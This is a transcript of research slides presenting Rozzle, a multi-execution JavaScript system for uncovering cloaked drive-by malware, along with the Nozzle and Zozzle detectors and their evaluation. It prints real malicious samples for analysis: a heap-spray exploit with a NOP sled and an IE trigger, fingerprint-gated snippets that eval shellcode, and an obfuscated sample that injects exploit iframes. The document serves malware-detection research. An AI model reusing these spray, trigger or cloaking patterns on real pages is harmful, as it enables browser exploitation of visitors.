Transcript Rozzle

Rozzle
De-Cloaking Internet Malware
Presenter: Yinzhi Cao
Slides by Ben Livshits
with
Clemens Kolbitsch, Ben Zorn,
Christian Seifert, Paul Rebriy
Microsoft Research
Static – Dynamic Analysis Spectrum
Entirely static
+ High scalability
+ High coverage
- Low precision
Symbolic execution (DART, SAGE, KLEE)
+ High precision
+ High coverage
- May not scale
Multi-execution
+ High precision
+ Scales reasonably well
? High coverage
- Watch out for resource usage
Entirely runtime
+ High precision
- High overhead
- Low coverage
2
Blacklisting Malware in Search Results
3
Motivation
Haha, I cannot belive this guy actually does this!! LOL
4
5
Drive-by Malware Detection Landscape
Axes: offline (honey-monkey) vs. online (browser-based); runtime vs. static
Nozzle [Usenix Security ’09] (runtime)
• Instrumented browser
• Looks for heap sprays
• Moderately high overhead
Zozzle [Usenix Security ’11] (static)
• Mostly static detection
• Low overhead, high reach
• Can be deployed in browser
6
Search Engine Crawling
7
Malware Cloaking
<script>
if (navigator.userAgent.indexOf('IE 6')>=0)
{
var x=unescape('%u4149%u1982%u90 […]');
eval(x);
}
</script>
Server side: detect crawler
• Source IP
• Request (User Agent, Browser ID)
Client: detect vulnerable target
• Fingerprint browser & plugin versions
• Do this using JavaScript
8
Client-side Cloaking Defense
Traditional
Rozzle
• Single browser, one visit
• Appear as vulnerable as possible
9
Background and Related Work
• Drive-by Download
– Exploits a client-side browser vulnerability and thereby triggers a malware download onto the client
– Can be divided into six steps
• Description of the Six Steps
• Comparison with JShield
10
Step One: Visiting a Malicious Web Site
• At this stage, a benign user visits a malicious web site.
• Defense mechanism: if the web site has been detected as malicious, a warning can be shown to keep the benign user from visiting it (as Google Safe Browsing does).
11
Step Two: Executing JavaScript
• After the content is downloaded to the client, the JavaScript gets executed.
• Related Work: Current work tries to execute JavaScript as fully as possible to achieve a better detection rate.
– Zozzle ([Usenix, 2011]): Executing JavaScript
– Wepawet: Executing JavaScript and extracting JavaScript from PDF
– Rozzle ([Oakland, 2012]): Symbolic execution +
fingerprinting JavaScript
12
Step Three: Heap Spraying
• JavaScript fills the heap with shellcode.
• Defense Mechanism:
– Zozzle ([Usenix, 2011]): Machine learning
– Nozzle ([Usenix, 2009]): Detecting whether heap objects contain executable code.
13
Step Four: Exploiting a Certain Vulnerability
• JavaScript code uses a certain pattern to trigger a native browser vulnerability.
• Defense mechanism:
– BrowserShield: Rewrites JavaScript and checks whether an operation would trigger the vulnerability, for example by checking the length involved in an operation.
14
Step Five: Downloading malware
• After the native browser vulnerability is exploited, malware is downloaded onto the client.
• Defense Mechanism:
– Blade ([CCS, 2010]): Checks whether a download was started through the normal download GUI. If it was not, the downloaded file is rejected.
15
Step Six: Executing malware
• After the malware is downloaded, it gets executed.
• Related Work:
– SpyProxy ([Usenix, 2007])
– WebShield ([NDSS, 2011])
– Provos et al. ([Usenix, 2008])
16
Overview
• Background & Motivation: Cloaking
• Detecting Internet Malware
• Rozzle: Fighting Evasion
• Experiments
Detecting Internet Malware
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
[Usenix Security 2009]
• Scan heap allocated objects to identify valid x86 code sequences
• Dynamic Detection
Zozzle: Low-overhead Mostly Static JavaScript Malware Detection
[Usenix Security 2011]
• Bayesian classification of hierarchical features of the JavaScript abstract syntax tree. In the browser (after unpacking)
• Static Detection
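As a rough illustration of Bayesian classification over syntax-tree features, the sketch below scores a script from a few "context:text" features. The feature names, every probability, and the `classify` helper are made up for illustration. This is not Zozzle's trained model or its API, only a minimal naive Bayes scorer under those assumptions.

```javascript
// Hypothetical model: all numbers are invented for illustration only.
const model = {
  prior: { malicious: 0.5, benign: 0.5 },
  // P(feature present | class) for a few assumed "context:text" features.
  likelihood: {
    "loop:unescape": { malicious: 0.30, benign: 0.01 },
    "function:getElementById": { malicious: 0.05, benign: 0.40 },
  },
};

// Naive Bayes over the features that are present: sum the log-likelihood
// ratios, start from the prior log-odds, and compare against zero.
function classify(features, m) {
  let logOdds = Math.log(m.prior.malicious / m.prior.benign);
  for (const feature of features) {
    const p = m.likelihood[feature];
    if (p) {
      logOdds += Math.log(p.malicious / p.benign);
    }
    // Features the model has never seen are ignored in this sketch.
  }
  return logOdds > 0 ? "malicious" : "benign";
}

const sprayLike = classify(["loop:unescape"], model);
const domLike = classify(["function:getElementById"], model);
console.log(sprayLike, domLike);
```

A real classifier would learn the likelihoods from labeled samples and would also account for absent features. The sketch only shows how per-feature evidence combines.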
18
Nozzle: Runtime Heap Spraying Detection
Normalized attack surface (NAS)
good
bad
19
Zozzle: Static/Statistical Detection
// Shellcode
var shellcode=unescape('%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33[…]');
bigblock=unescape("%u0D0D%u0D0D");
headersize=20;shellcodesize=headersize+shellcode.length;
while(bigblock.length<shellcodesize){bigblock+=bigblock;}
heapshell=bigblock.substring(0,shellcodesize);
nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
while(nopsled.length+shellcodesize<0x25000){nopsled=nopsled+nopsled+heapshell}
// Spray
var spray=new Array();
for(i=0;i<500;i++){spray[i]=nopsled+shellcode;}
// Trigger
function trigger(){
var varbdy = document.createElement('body');
varbdy.addBehavior('#default#userData');
document.appendChild(varbdy);
try {
for (iter=0; iter<10; iter++) {
varbdy.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('butid').onclick();
Highlighted features: shellcode, unescape, bigblock, shellcodesize, shellcode.length, bigblock.substring, bigblock.length, nopsled, nopsled.length, heapshell, spray, varbdy.addBehavior, #default#userData, document.appendChild, varbdy, varbdy.setAttribute, butid
20
Overview
• Background & Motivation: Cloaking
• Detecting Internet Malware
• Rozzle: Fighting Evasion
• Experiments
Environment Fingerprinting Prevents Detection (Nozzle, Zozzle)
<script>
if (navigator.userAgent.indexOf('IE 6')>=0)
{
var x=unescape('%u4149%u1982%u90 […]');
eval(x);
}
</script>
<script>
var adobe=new ActiveXObject('AcroPDF.PDF');
var adobeVersion=adobe.GetVariable('$version');
if (navigator.userAgent.indexOf('IE 6')>=0 &&
adobeVersion == '9.1.3')
{
var x=unescape('%u4149%u1982%u90 […]');
eval(x);
}
</script>
Is this a practical problem for our malware detectors?
• In 7.7% of JS files, code gets a reference to the environment
• In 1.2%, code branches on such sensitive values
• 89.5% of malicious JS branches on such values
22
Typical Malware Cloaking
23
More Complex Fingerprinting
Fingerprint: Q0193807F127J14
24
Avoiding Dynamic Crawlers
25
Avoiding Static Detection
26
How to Allocate Detection Resources?
[Figure: Rozzle; software version numbers 1.4, 1.5, 2.0, …; 9.0, 9.1, 10.0, …; 8, 9, 10]
How many resources should be allocated to filter malicious sites?
What if the site is simply not malicious?
Clearly does not scale
27
Rozzle
Multi-path execution framework for JavaScript
What it is/does
• Multiple browser profiles on single machine, similar to running multiple browsers in parallel
• Branch on environment-sensitive checks
• Execute individual branches sequentially to increase coverage
What it is not
• Cluster of machines: too resource consuming
• Symbolic execution: No forking, no snapshotting (reverting to a previous state)
• Static analysis: Retain much of runtime precision
28
Multi-Execution in Rozzle
<script>
var adobe=new ActiveXObject('AcroPDF.PDF');
var adobeVersion=adobe.GetVariable('$version');
if (navigator.userAgent.indexOf('IE 7')>=0 &&
adobeVersion == '9.1.3')
{
var x=unescape('%u4149%u1982%u90 […]');
eval(x);
}
else if (adobeVersion == '8.0.1')
{
var x=unescape('%u4073%u8279%u77 […]');
eval(x);
}
…
</script>
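To make the idea of executing both environment-sensitive branches concrete, here is a minimal sketch. It assumes a hypothetical `multiExecute` helper and models each branch as a predicate string plus a body. A `record` callback stands in for `eval`, so nothing is actually evaluated. It illustrates sequential multi-path execution in general and is not Rozzle's implementation.

```javascript
// Hypothetical sketch of sequential multi-path execution.
// Each branch has a human-readable predicate and a body. The body receives a
// `record` callback in place of eval(), so payloads are only collected.
function multiExecute(branches) {
  const observed = [];
  for (const branch of branches) {
    const effects = [];
    // Run the body even though the predicate may be false in this environment,
    // and remember the predicate under which the body ran.
    branch.body((payload) => effects.push(payload));
    observed.push({ pathPredicate: branch.predicate, effects });
  }
  return observed;
}

const observed = multiExecute([
  {
    predicate: "userAgent has 'IE 7' && adobeVersion == '9.1.3'",
    body: (record) => record("payload for version 9.1.3"),
  },
  {
    predicate: "!(first predicate) && adobeVersion == '8.0.1'",
    body: (record) => record("payload for version 8.0.1"),
  },
]);

for (const { pathPredicate, effects } of observed) {
  console.log(pathPredicate, "=>", effects);
}
```

A single visit thus exposes both payloads to a detector, where a crawler with one fixed profile would see at most one of them.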
29
Challenges
Consistent updates
of variables
Introduce concept of Symbolic Memory:
• Multiple concrete values associated with one variable
• New JavaScript data type Symbolic
• 3 subtypes
• symbolic value / formula / conditional
• Weak updates for conditional assignments
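One way to picture the three subtypes and a weak update is the sketch below. The constructor names (`symValue`, `symFormula`, `symConditional`) and the `weakUpdate` helper are assumptions made for illustration. The slides do not show the real data layout.

```javascript
// Hypothetical representations of the three subtypes named above.
const symValue = (source) => ({ kind: "value", source });
const symFormula = (op, ...args) => ({ kind: "formula", op, args });
const symConditional = (cond, thenValue, elseValue) =>
  ({ kind: "conditional", cond, thenValue, elseValue });

// Weak update: an assignment made under a symbolic path predicate keeps the
// old value for the case in which the predicate turns out to be false.
// A null predicate means the assignment is unconditional (strong update).
function weakUpdate(memory, name, newValue, pathPredicate) {
  memory[name] = pathPredicate === null
    ? newValue
    : symConditional(pathPredicate, newValue, memory[name]);
}

const memory = { isIE: false };
const userAgent = symValue("navigator.userAgent");
const check = symFormula(">=", symFormula("indexOf", userAgent, "IE"), 0);

// Models `isIE = true;` inside `if (navigator.userAgent.indexOf('IE') >= 0)`.
weakUpdate(memory, "isIE", true, check);
console.log(JSON.stringify(memory.isIE, null, 2));
```

After the update, `isIE` holds both candidate values (`true` and the earlier `false`) tied to the condition, rather than a single concrete value.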
30
Symbolic Memory
<script>
var userAgentString=0;
userAgentString = navigator.userAgent;
var isIE;
isIE = (userAgentString.indexOf('IE')>=0);
…
Variable : userAgentString
Value : 0, then < navigator.userAgent >
Symbolic : no, then yes
Variable : isIE
Value : < navigator.userAgent.indexOf('IE') >= 0 >
Symbolic : yes
Hooks into engine, return symbolic values for
• Sensitive global objects: navigator.userAgent, navigator.platform, …
• Sensitive functions: ScriptEngine(), allocation of ActiveXObject, …
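The hooks live inside the JavaScript engine, which plain script code cannot reproduce. As a loose analogy only, the sketch below uses a standard `Proxy` to return a symbolic placeholder whenever a sensitive property is read. The `Sym` class, the `hookEnvironment` helper, and the `gte` method (JavaScript cannot overload `>=`) are all hypothetical.

```javascript
// Properties treated as environment-sensitive in this sketch.
const SENSITIVE = new Set(["userAgent", "platform"]);

// A symbolic placeholder that records the expression that produced it.
class Sym {
  constructor(expr) {
    this.expr = expr;
  }
  indexOf(needle) {
    return new Sym(`${this.expr}.indexOf(${JSON.stringify(needle)})`);
  }
  gte(n) {
    return new Sym(`${this.expr} >= ${n}`);
  }
}

// Wrap a navigator-like object: sensitive reads become symbolic,
// everything else passes through unchanged.
function hookEnvironment(realNavigator) {
  return new Proxy(realNavigator, {
    get(target, prop) {
      return SENSITIVE.has(prop)
        ? new Sym(`navigator.${String(prop)}`)
        : target[prop];
    },
  });
}

const nav = hookEnvironment({ userAgent: "crawler/1.0", language: "en-US" });
const isIE = nav.userAgent.indexOf("IE").gte(0);
console.log(isIE.expr);    // navigator.userAgent.indexOf("IE") >= 0
console.log(nav.language); // en-US
```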
31
Symbolic Memory
<script>
var isIE=false;
var isIE7=false;
if (navigator.userAgent.indexOf('IE')>=0)
{
isIE=true;
if (navigator.userAgent.indexOf('IE 7')>=0)
{
isIE7=true;
}
}
if (isIE7)
{
…
Variable : isIE
Value : false, then < nav.userAgent.indexOf(…)>=0 > ? true : false
Symbolic : no, then yes
Variable : isIE7
Value : false, then <…>
Symbolic : no, then yes
Current path predicate
Value : < nav.userAgent.indexOf(..)>=0 >, then < nav.userAgent.indexOf(..)>=0 > && < nav.userAgent.indexOf(..)>=0 >
Symbolic : yes
32
Symbolic Memory
Variable : isIE
Value : < nav.userAgent.indexOf(…)>=0 > ? true : false
Symbolic : yes
Expression tree:
?
  >=
    indexOf
      navigator.userAgent
      'IE'
    0
  true
  false
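A symbolic value stored as an expression tree can be turned into a concrete value once a browser profile is chosen. The sketch below assumes a hypothetical node layout and a hypothetical `concretize` helper. The two profile strings are invented examples.

```javascript
// Tree for: navigator.userAgent.indexOf('IE') >= 0 ? true : false
const tree = {
  op: "?:",
  cond: {
    op: ">=",
    left: {
      op: "indexOf",
      target: { op: "env", name: "navigator.userAgent" },
      arg: "IE",
    },
    right: 0,
  },
  thenValue: true,
  elseValue: false,
};

// Evaluate the tree bottom-up against one concrete profile.
function concretize(node, profile) {
  if (node === null || typeof node !== "object") {
    return node; // literal leaf such as 0, true, or false
  }
  switch (node.op) {
    case "env":
      return profile[node.name];
    case "indexOf":
      return concretize(node.target, profile).indexOf(node.arg);
    case ">=":
      return concretize(node.left, profile) >= concretize(node.right, profile);
    case "?:":
      return concretize(node.cond, profile)
        ? concretize(node.thenValue, profile)
        : concretize(node.elseValue, profile);
    default:
      throw new Error("unknown node: " + node.op);
  }
}

const asIE = concretize(tree, { "navigator.userAgent": "MSIE 7.0" });
const asOther = concretize(tree, { "navigator.userAgent": "Firefox/3.6" });
console.log(asIE, asOther); // true false
```

Keeping the tree around and evaluating it only on demand is one way to read "lazy evaluation to concrete values".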
33
Challenges
• Consistent updates of variables
• Indirect control flow: Exception handling
– try-blocks regularly used to test availability of plugins (ActiveXObjects)
– catch-blocks set default values, cannot be ignored
– Execute catch-statement similar to else branch, add virtual if-condition: “ActiveX supported”
• I/O
– Handling symbolic values when they are written to the DOM, sent to a remote server, or executed (as part of eval)
– Lazy evaluation to concrete values (only when needed)
• Handling loops
– Loop condition might be symbolic, number of iterations unknown!
– Unroll k iterations (currently k=1)
– Instruction pointer checks (endless loops/recursion)
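The loop handling described on this slide can be sketched as bounded unrolling: when the loop condition cannot be decided because it is symbolic, the body runs at most k times. The `SYMBOLIC` sentinel and the `runLoop` helper below are hypothetical and only model the idea.

```javascript
// Sentinel meaning "this condition depends on a symbolic value".
const SYMBOLIC = Symbol("symbolic");

// Run a loop whose condition may be concrete (true/false) or SYMBOLIC.
// Concrete conditions behave as usual. A symbolic condition lets the body
// run until k iterations have been executed in total, then the loop stops.
function runLoop(condition, body, k = 1) {
  let iterations = 0;
  while (true) {
    const c = condition(iterations);
    if (c === SYMBOLIC && iterations >= k) break; // unknown trip count: cap at k
    if (c !== SYMBOLIC && !c) break;              // ordinary loop exit
    body(iterations);
    iterations += 1;
  }
  return iterations;
}

const concreteCount = runLoop((i) => i < 3, () => {});
const symbolicCount = runLoop(() => SYMBOLIC, () => {}, 1);
console.log(concreteCount, symbolicCount); // 3 1
```

With k=1 the body of a symbolically controlled loop is seen once, which trades completeness for a bounded running time.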
34
Experiments
Offline
• Controlled Experiment
• 7x more Nozzle detections
Online
• Similar to Bing crawling
• Almost 4x more Nozzle detections
• 10.1% more Zozzle detections
Overhead
• 1.1% runtime overhead
• 1.4% memory overhead
35
Offline
• Exploits hosted on our server
• Minimize external influences
• 70,000 known malicious scripts (flagged by Zozzle)
• Fully unrolled/de-obfuscated exploits, wrapped in HTML
[Chart: Shared / New Detections / Errors; value label 10,381; +595% runtime detections]
36
Online
• Dedicated machine for crawling the web
• Clone of the Bing malware crawler
• List of URLs recently crawled by Bing
• Pre-filtering: Increase likelihood of finding malicious sites
• 57,000 URLs over the last week
[Chart: Nozzle Detections and Zozzle Detections; value labels 225, 24, 156, 50, 174, 2,510; +203% runtime detections]
37
Overhead
• Average numbers of 3 repeated runs per
configuration
• Base runs (cookie setup)
• 500 randomly selected URLs crawled by Bing
• Slightly biased towards malicious sites (pre-filtering)
Runtime Overhead: Median 0.0%, 80th Percentile 1.1%
Memory Overhead: Median 0.6%, 80th Percentile 1.4%
39
40
[Figure: Overhead Numbers; only axis ticks (0.700 to 2.140) and bar counts survived extraction]
Take Away
• For most sites, virtually no overhead
• Tremendous impact on runtime detector due to increased path coverage
• Visible impact on static detector
• More important with growing trend to obfuscation
• Also improves other existing tools: Exposes detectors to additional site content
41
Online
… an example pulled from our DB…
if (navigator.userAgent.toLowerCase().indexOf(
"\x6D"+"\x73\x69\x65"+"\x20\x36")>0)
document.write("<iframe src=x6.htm></iframe>");
if (navigator.userAgent.toLowerCase().indexOf(
"\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37")>0)
document.write("<iframe src=x7.htm></iframe>");
try {
var a; var aa=new ActiveXObject("Sh"+"ockw"+"av"+"e"+"Fl"+[…]);
} catch(a) { } finally {
if (a!="[object Error]")
document.write("<iframe src=svfl9.htm></iframe>");
}
try {
var c; var f=new ActiveXObject("O"+"\x57\x43"+"\x31\x30\x2E\x53"+[…]);
} catch(c) { } finally {
if (c!="[object Error]") {
aacc = "<iframe src=of.htm></iframe>";
setTimeout("document.write(aacc)", 3500);
} }
Callouts:
"\x6D"+"\x73\x69\x65"+"\x20\x36" = "msie 6"
"\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37" = "msie 7"
"O"+"\x57\x43"+"\x31\x30\x2E\x53"+"pr"+"ea"+"ds"+"he"+"et" = "OWC10.Spreadsheet"
42
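The obfuscated string literals in the sample on the preceding slide are ordinary hex escapes split across concatenations, so evaluating the expressions is enough to recover the plain strings. The variable names below are ours, chosen for illustration.

```javascript
// Each \xNN escape is one character; concatenation rebuilds the plain string.
const ie6 = "\x6D" + "\x73\x69\x65" + "\x20\x36";
const ie7 = "\x6D" + "\x73" + "\x69" + "\x65" + "\x20" + "\x37";
const progId = "O" + "\x57\x43" + "\x31\x30\x2E\x53" + "pr" + "ea" + "ds" + "he" + "et";

console.log(ie6);    // msie 6
console.log(ie7);    // msie 7
console.log(progId); // OWC10.Spreadsheet
```

This is why static matching on literal text such as "msie 6" misses the check, while a detector that sees the evaluated values does not.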
Summary
• Rozzle: Multi-profile execution
– Look as vulnerable as possible
– Improve existing malware detectors
• Implementation:
– Implemented on top of IE9’s JavaScript engine
– Still some flaws, promising results
• Idea of multi-execution is promising in other contexts
45
Static – Dynamic Analysis Spectrum
Entirely static
+ High scalability
+ High coverage
- Low precision
Symbolic execution (DART, SAGE)
+ High precision
+ High coverage
- May not scale
Multi-execution
+ High precision
+ Scales reasonably well
? High coverage
- Watch out for resource usage
Entirely runtime
+ High precision
- High overhead
- Low coverage
46